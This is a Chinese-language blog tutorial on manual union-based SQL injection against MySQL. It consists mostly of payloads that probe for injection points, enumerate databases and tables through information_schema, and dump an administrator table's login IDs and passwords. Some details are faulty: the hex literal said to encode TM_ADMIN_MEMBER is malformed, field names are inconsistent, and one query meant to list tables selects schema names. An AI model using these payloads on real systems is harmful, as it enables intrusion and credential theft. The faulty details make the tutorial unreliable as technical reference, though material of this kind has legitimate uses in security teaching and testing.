注入篇

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了注入篇相关的知识,希望对你有一定的参考价值。

一、简易注入

0x1判断注入点

常用的有  and 1=1 and 1=2  ‘  "

 

0x2判断数据库类型

 and user>0 报错  and version()>0正常 则为mysql数据库

 

0x3猜解当前网页的字段数

order by num

 

0x4爆出当前网页显示位

and 1=2 union select 1,2,3,4,....,num --

 

0x5爆出数据库基本信息

//假设显示位为2

and 1=2 union select 1,concat(user(),0x20,database(),0x20,version()),3,4,...,num --

User() 查看用户  
database()  --查看数据库名称     
Version() --查看数据库版本   
@@datadir --数据库路径
@@version_compile_os--操作系统版本   
system_user() --系统用户名  
current_user()--当前用户名   
session_user()--连接数据库的用户名
为了显示信息更方便,这里在构造sql查询语句中使用了concat函数,它连接一个或者多个字符串, 有任何一个参数为NULL ,则返回值为 NULL。还有group_concat()和concat_ws()

 

0x6爆出所有数据库名

//一般都有information_schema数据库

and 1=2 union select 1,group_concat(distinct+table_schema),3,4,...,num+from+information_schema.columns --

 

0x7爆出当前数据库表名

and 1=2 union select 1,group_concat(distinct+table_schema),3,4,...,num from information_schema.tables+where +table_schema=database() --

      爆出数据库所有表名

and 1=2 union select 1,group_concat(distinct+table_name),3,4,...,num from information_schema.tables+where +table_schema=database() --

 

0x8爆出当前数据库表字段

and 1=2 union select 1,group_concat(distinct+table_schema),3,4,...,num

from+information_schema.columns+where+table_name=0x544D5F41444D494E5F4D454D42552(该十六进制为TM_ADMIN_MEMBER) --

                                                                                    

0x9爆出数据库表的数据

//这里假设爆出来的表的字段名为amdin_id login_id login_pwd

and 1=2 union select 1,group_concat(admin_id,0x2B,login_uid,0x2B,login_pwd),3,4,...,num

from+TM_ADMIN_MEMBER --

 

以上是关于注入篇的主要内容,如果未能解决你的问题,请参考以下文章

基础篇——SQL注入(手工注入)

sql注入篇简单技术

XML注入:理论篇--定义原因防御

Spring入门篇3 --- 依赖注入(DI)方式集合注入

SQL注入系列篇之union联合注入

java框架篇---spring IOC依赖注入